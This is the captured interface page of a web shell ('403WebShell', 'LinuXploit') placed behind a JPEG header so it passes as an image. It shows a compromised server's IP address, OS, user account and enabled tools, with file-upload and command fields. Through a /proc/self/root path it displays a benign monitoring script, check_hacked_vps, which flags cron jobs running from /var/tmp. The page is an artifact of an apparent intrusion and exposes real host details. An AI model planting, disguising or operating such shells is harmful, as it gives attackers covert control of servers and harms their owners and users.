����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 216.73.216.170
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/1630575/root/proc/1630575/root/proc/self/root/usr/lib64/nagios/plugins/extra/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/1630575/root/proc/1630575/root/proc/self/root/usr/lib64/nagios/plugins/extra/check_hacked_vps
#!/bin/bash

#MATH_CRON1='/var/tmp/[:alnum:]*'
MATH_CRON1='/var/tmp/'
WHITE_LIST=$(test -f /etc/icinga2/plinc/hackedvps_whitelist && cat /etc/icinga2/plinc/hackedvps_whitelist)

WARN=0

CTIDs=$(sudo vzlist -H -octid)

for ctid in $CTIDs;
do
    CTIP=$(sudo vzlist | grep $ctid | awk '{print $4}')
    if echo $WHITE_LIST | grep -q $ctid
    then
        continue
    fi
    if sudo test -d /vz/root/$ctid/var/spool/cron && sudo grep -r $MATH_CRON1 /vz/root/$ctid/var/spool/cron | grep -qv ":#"
    then
        WARN=1;
        RETURN+="CT $ctid $CTIP: may be has been hacked, found cron task for run script in $MATH_CRON1\n"
    fi
done

if [ $WARN -eq 1 ];
then
    echo -n -e "$RETURN"
else
    echo "Hacked VPS not found"
fi
exit $WARN

Youez - 2016 - github.com/yon3zu
LinuXploit